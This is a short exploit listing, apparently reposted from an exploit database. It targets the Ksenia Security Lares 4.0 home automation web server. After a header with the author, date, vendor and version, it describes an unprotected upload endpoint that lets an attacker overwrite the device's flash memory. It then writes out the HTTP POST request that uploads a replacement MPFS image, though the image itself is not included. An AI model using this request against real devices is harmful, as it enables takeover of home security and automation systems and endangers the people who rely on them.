Exploit for Ksenia Security Lares 4.0 Remote Code Execution

## https://sploitus.com/exploit?id=PACKETSTORM:190178
# Exploit Title: Ksenia Security Lares 4.0 Home Automation Remote Code 
    Execution
    # Google Dork: N/A
    # Date: 31 March 2025
    # Exploit Author: Mencha 'ShadeLock' Isajlovska
    # Vendor Homepage: https://www.kseniasecurity.com/en/
    # Software Link: 
    https://www.kseniasecurity.com/en/company/why-lares-4-0.html
    # Version: Lares 4.0
    # Tested on: Ksenia Lares Webserver
    # CVE : N/A
    # Desc: The device provides access to an unprotected endpoint, enabling
    the upload of MPFS File System binary images. Authenticated attackers
    can exploit this vulnerability to overwrite the flash program memory
    containing the web server's main interfaces, potentially leading to
    arbitrary code execution.
    
    
    POST /upload HTTP/1.1
    Host: 192.168.1.2
    
    ------WebKitFormBoundary5GYWB4nichZAk7BS
    Content-Disposition: form-data; name="i"; filename="MPFSImage.bin"
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundary5GYWB4nichZAk7BS--